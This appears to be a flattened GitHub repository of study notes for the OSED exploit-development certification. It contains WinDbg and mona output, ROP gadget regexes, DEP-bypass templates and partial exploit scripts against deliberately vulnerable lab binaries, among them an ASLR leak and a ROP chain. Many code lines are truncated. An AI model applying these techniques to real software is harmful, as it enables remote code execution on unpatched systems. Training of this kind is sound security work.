struct.pack(" [ECX] 182 | payload += struct.pack(" !dh module 54 | ...... 55 | 56 | SECTION HEADER #6 57 | .idata name 58 | 224 virtual size 59 | 6000 virtual address 60 | 400 size of raw data 61 | 1600 file pointer to raw data 62 | 0 file pointer to relocation table 63 | 0 file pointer to line numbers 64 | 0 number of relocations 65 | 0 number of line numbers 66 | C0300040 flags 67 | Initialized Data 68 | 4 byte align 69 | Read Write 70 | ............ 71 | 72 | 0:000> ? modules + 224 + 6000 + 4 73 | Evaluate expression: 1649435176 = 62506228 74 | 75 | 0:000> !address 62506228 76 | Usage: Image 77 | Base Address: 62506000 78 | End Address: 62507000 79 | Region Size: 00001000 ( 4.000 kB) 80 | State: 00001000 MEM_COMMIT 81 | Protect: 00000004 PAGE_READWRITE 82 | Type: 01000000 MEM_IMAGE 83 | Allocation Base: 62500000 84 | Allocation Protect: 00000080 PAGE_EXECUTE_WRITECOPY 85 | Image Path: C:\Users\User\Desktop\vulnserver\essfunc.dll 86 | Module Name: essfunc 87 | Loaded Image Name: 88 | Mapped Image Name: 89 | More info: lmv m essfunc 90 | More info: !lmi essfunc 91 | More info: ln 0x62506228 92 | More info: !dh 0x62500000 93 | ``` 94 | 95 | 7. Get IAT 96 | ```py 97 | 0:009> !dh fsws -f 98 | 0 DLL characteristics 99 | 0 [ 0] address [size] of Export Directory 100 | 192B50 [ 1CC] address [size] of Import Directory 101 | 1AE000 [ 133E0] address [size] of Resource Directory 102 | 0 [ 0] address [size] of Exception Directory 103 | 0 [ 0] address [size] of Security Directory 104 | 0 [ 0] address [size] of Base Relocation Directory 105 | 166C40 [ 1C] address [size] of Debug Directory 106 | 0 [ 0] address [size] of Description Directory 107 | 0 [ 0] address [size] of Special Directory 108 | 0 [ 0] address [size] of Thread Storage Directory 109 | 0 [ 0] address [size] of Load Configuration Directory 110 | 0 [ 0] address [size] of Bound Import Directory 111 | 166000 [ C40] address [size] of Import Address Table Directory 112 | 0 [ 0] address [size] of Delay Import Directory 113 | 0 [ 0] address [size] of COR20 Header Directory 114 | 0 [ 0] address [size] of Reserved Directory 115 | 116 | 0:009> dps fsws +0x166000 L100 117 | 00566000 7606eb20 advapi32!RegCloseKeyStub 118 | 00566004 760731e0 advapi32!RegEnumKeyA 119 | 00566008 7606ea50 advapi32!RegQueryValueExAStub 120 | 005662f4 7588b6b0 KERNEL32!GetPrivateProfileStringA 121 | 005662f8 7588ae50 KERNEL32!WritePrivateProfileStringA 122 | 005662fc 758887a0 KERNEL32!GetModuleFileNameAStub 123 | ...... 124 | 0:009> dps 125 | ...... 126 | ``` 127 | ## Regex ROP 128 | ```py 129 | : # (jmp|call) esp 130 | : # mov e..,e.. 131 | : # xchg e..,e.. 132 | : # push e.. # RETN 133 | : # push e.. # pop e.. # RETN 134 | : # pop e.. # RETN 135 | : # inc e.. 136 | : # dec e.. 137 | : # neg e.. 138 | : # push e.. 139 | : # pop e.. 140 | : # ADD E..,e.. 141 | : # pushad # RETN 142 | : # and E..,(E..|0x.+?|[[:alnum:]])+ 143 | : # xor E..,(E..|0x.+?|[[:alnum:]])+ 144 | : # ADD E..,(E..|0x.+?|[[:alnum:]])+ 145 | : # sub E..,(E..|0x.+?|[[:alnum:]])+ 146 | : # mov e..,DWORD PTR 147 | : # lea e.., 148 | : # MOV DWORD PTR \[(E..|E..\+[[:alnum:]]+)\],EAX 149 | ``` 150 | 151 | ## VirtualProtect Basic Template 152 | 153 | ```py 154 | #GOALS - VirtualProtect 155 | #EAX 90909090 => Nop 156 | #ECX => lpflOldProtect 157 | #EDX 00000040 => flNewProtect 158 | #EBX 00000201 => dwSize 512 159 | #ESP ???????? => Leave as is 160 | #EBP ???????? => Call to ESP (jmp, call, push,..) -> !py mona jmp -r esp -cpb '\x00' 161 | #ESI ???????? => PTR to VirtualProtect - DWORD PTR of VirtualProtect 162 | #EDI RETN => ROP-Nop same as EIP --> !py mona find -type instr -s "retn" -m module.dll -cpb "\x00" 163 | ``` 164 | ## VirtualProtect Sniper Template 165 | 166 | ```py 167 | # Calling VirtualProtect with parameters 168 | payload += struct.pack(' Nop 180 | # ECX 00000040 => flProtect 181 | # EDX 00001000 => flAllocationType 182 | # EBX 00000001 => dwSize 183 | # ESP ???????? => Leave as is 184 | # EBP ???????? => Call to ESP (jmp, call, push,..) !py mona jmp -r esp -cpb '\x00' 185 | # ESI ???????? => PTR to VirtualAlloc - DWORD PTR of VirtualAlloc 186 | # EDI RETN => ROP-Nop same as EIP !py mona find -type instr -s "retn" -m modulo.dll -cpb "\x00" 187 | ``` 188 | 189 | ## WriteProcessMemory Template 190 | No encoding for this method! Create manually the shellcode 191 | ```py 192 | # kernel32!WriteProcessMemory placeholder parameters 193 | payload += struct.pack(' Nop {DONE} 14 | #ECX 0x62506f00 => flProtect {DONE} 15 | #EDX 00000040 => flNewProtect {DONE} 16 | #EBX 00000201 => dwSize - 513 {DONE} 17 | #ESP ???????? => Leave as is 18 | #EBP ???????? => Call to ESP (jmp, call, push,..) {DONE} 19 | #ESI ???????? => PTR to VirtualAlloc - DWORD PTR of 0x6250609c {DONE} 20 | #EDI ???????? => ROP-Nop {DONE} 21 | ###### 22 | 23 | rop_nop = struct.pack(" essfunc.dll 81 | ebx += struct.pack(" essfunc.dll 91 | esi += struct.pack(" [EAX] 126 | payload += struct.pack(' [ECX] 134 | payload += struct.pack(' put 0x00000001 into ebx) 54 | rop += struct.pack(" put 0x00001000 into edx) 59 | rop += struct.pack(" put 0x00000040 into ecx) 64 | rop += struct.pack(" DebugHelp o SymGetSymFromName 5 | 6 | 7 | Basically: 8 | 1. Info Leak OR 9 | 2. Modules without ASLR enabled OR 10 | 11 | ```py 12 | !py mona modules -cm aslr=false,rebase=false 13 | ``` 14 | 3. If possible bruteforce on the addresses 15 | -------------------------------------------------------------------------------- /6.asrl_enabled/Rainbow2/README.md: -------------------------------------------------------------------------------- 1 | Downloaded from here: [https://github.com/xct/vulnbins/tree/main](https://github.com/xct/vulnbins/blob/main/rainbow2.exe) 2 | -------------------------------------------------------------------------------- /6.asrl_enabled/Rainbow2/exploit_wpm.py: -------------------------------------------------------------------------------- 1 | import struct 2 | import socket 3 | 4 | TARGET_IP = "127.0.0.1" 5 | TARGET_PORT = 2121 6 | target = (TARGET_IP, TARGET_PORT) 7 | 8 | payload = b"PUT %p-%p-%p-%p" 9 | leak = [] 10 | with socket.create_connection(target) as sock: 11 | sent = sock.send(payload) 12 | print(f"sent {sent} bytes") 13 | 14 | resp = sock.recv(512) 15 | print(resp) 16 | 17 | 18 | s = str(resp) 19 | leak = s.split("-")[1] 20 | filesrv = int(hex(int("0x"+leak,16) - 0x14120),16) 21 | #print(base) 22 | 23 | #EXPLOIT 24 | 25 | #\x00\x09\x0a\x0b\x0c\x0d\x20\x2F\x5C 26 | total = 2100 # change me 27 | crash = 1032 28 | 29 | rop_nop = struct.pack(" u poi(3FC6015C) --> #KERNEL32!WriteFile: 39 | rop += struct.pack(' u poi(3FC6015C)+13a40 -> WriteProcessMemoryStub 49 | rop += struct.pack(' Nop 17 | # ECX 00000040 => flProtect 18 | # EDX 00001000 => flAllocationType 19 | # EBX 00000001 => dwSize 20 | # ESP ???????? => Leave as is 21 | # EBP ???????? => Call to ESP (jmp, call, push,..) DONE !py mona jmp -r esp -cpb '\x00\x0d\x0a\x25\x26\x2b\x3d' 22 | # ESI ???????? => PTR to VirtualAlloc - DWORD PTR of VirtualAlloc 23 | # EDI RETN => ROP-Nop same as EIP !py mona find -type instr -s "retn" -m libspp.dll -cpb "\x00\x0d\x0a\x25\x26\x2b\x3d" 24 | #---------------------------------------------------------------------# 25 | 26 | 27 | #EAX 28 | eax = struct.pack(" KERNEL32!GetDriveTypeA 54 | esi += struct.pack(" Decimal (int): output decimal number 4 | 2. %s --> String: Reads string from memory 5 | 3. %x --> Hexadecimal: Hexadecimal Number 6 | 4. %n --> Number of bytes written so far: Writes the number of bytes till the format string to memory 7 | 8 | 9 | ## Resources 10 | 1. https://www.exploit-db.com/docs/english/28476-linux-format-string-exploitation.pdf 11 | 2. https://osandamalith.com/2018/02/01/exploiting-format-strings-in-windows/ 12 | 3. https://vulndev.io/2022/06/12/bypassing-dep-with-writeprocessmemory/ 13 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # OSED Notes + Exercise 2 | 3 | Containing some notes + exercises that I've done during my study for the Offensive Security Exploit Developer. 4 | 5 | Every exercise has been done on Windows 10 x86. 6 | 7 | ## Contents 8 | - [Stack Overflow](https://github.com/mrtouch93/OSED-Notes/tree/main/1.stack_overflow) 9 | - [SEH Overflow](https://github.com/mrtouch93/OSED-Notes/tree/main/2.seh-overflow) 10 | - [Egghunter](https://github.com/mrtouch93/OSED-Notes/tree/main/3.egghunter) 11 | - [DEP Bypass](https://github.com/mrtouch93/OSED-Notes/tree/main/5.dep_bypass) 12 | - [ASLR+DEP Bypass](https://github.com/mrtouch93/OSED-Notes/tree/main/6.asrl_enabled) 13 | - [Format String](https://github.com/mrtouch93/OSED-Notes/tree/main/7.format_strings) 14 | 15 | ## Mona Cheat Sheets 16 | 1. https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/ 17 | 2. https://www.slideshare.net/CeSeNA/mona-cheatsheet-8833245 18 | 19 | ## WinDBG Cheat Sheets 20 | 1. https://sites.google.com/site/taesaza0/etc/windbgcheatsheet?overridemobile=true 21 | 2. https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/getting-started-with-windbg 22 | 3. http://windbg.info/doc/1-common-cmds.html 23 | 4. http://etutorials.org/Programming/programming+microsoft+visual+c+sharp+2005/Part+IV+Debugging/Chapter+13+Advanced+Debugging/WinDbg/ 24 | 5. https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/windows-debugging-exploiting-part-2-windbg-101/ 25 | 6. https://web.archive.org/web/20160506031348/https://mtaulty.com/2004/08/03/m_4656/ 26 | 27 | 28 | ## Additional Resources 29 | 1. https://github.com/epi052/osed-scripts 30 | 2. https://github.com/nop-tech/OSED 31 | 3. https://github.com/sradley/osed 32 | 4. https://github.com/ommadawn46/win-x86-shellcoder 33 | 5. https://www.fuzzysecurity.com/tutorials.html (Windows Exploit Development Tutorial Series) 34 | 6. https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/ (Follow every guides) 35 | 7. https://www.shogunlab.com/blog/2017/08/11/zdzg-windows-exploit-0.html 36 | 8. https://sec4us.com.br/cheatsheet/bufferoverflow-egghunting 37 | 9. https://mikeczumak.com/blog/windows-exploit-development-part-1-basics/ 38 | 10. https://epi052.gitlab.io/notes-to-self/blog/2020-05-22-osce-exam-practice-part-seven/ 39 | 11. https://web.archive.org/web/20190218144432/https://vellosec.net/2018/08/carving-shellcode-using-restrictive-character-sets/ 40 | 41 | ## Additional Exercises 42 | 1. https://github.com/Nero22k/Exploit_Development 43 | 2. https://github.com/CyberSecurityUP/Buffer-Overflow-Labs 44 | 3. https://www.purpl3f0xsecur1ty.tech/2021/05/26/trun_re.html 45 | 4. https://github.com/anvbis/windows.x86.expl 46 | 5. https://gitlab.csc.tntech.edu/CIG/CIG-Infrastructure/-/blob/script-fixes/ExploitDBApps/Windows.vuln.apps 47 | 6. https://github.com/VoidSec/Exploit-Development/tree/master/windows/x86 48 | 7. https://github.com/connormcgarr/Exploit-Development/ 49 | 8. https://github.com/xct/vulnbins 50 | 9. https://github.com/bmdyy/signatus 51 | --------------------------------------------------------------------------------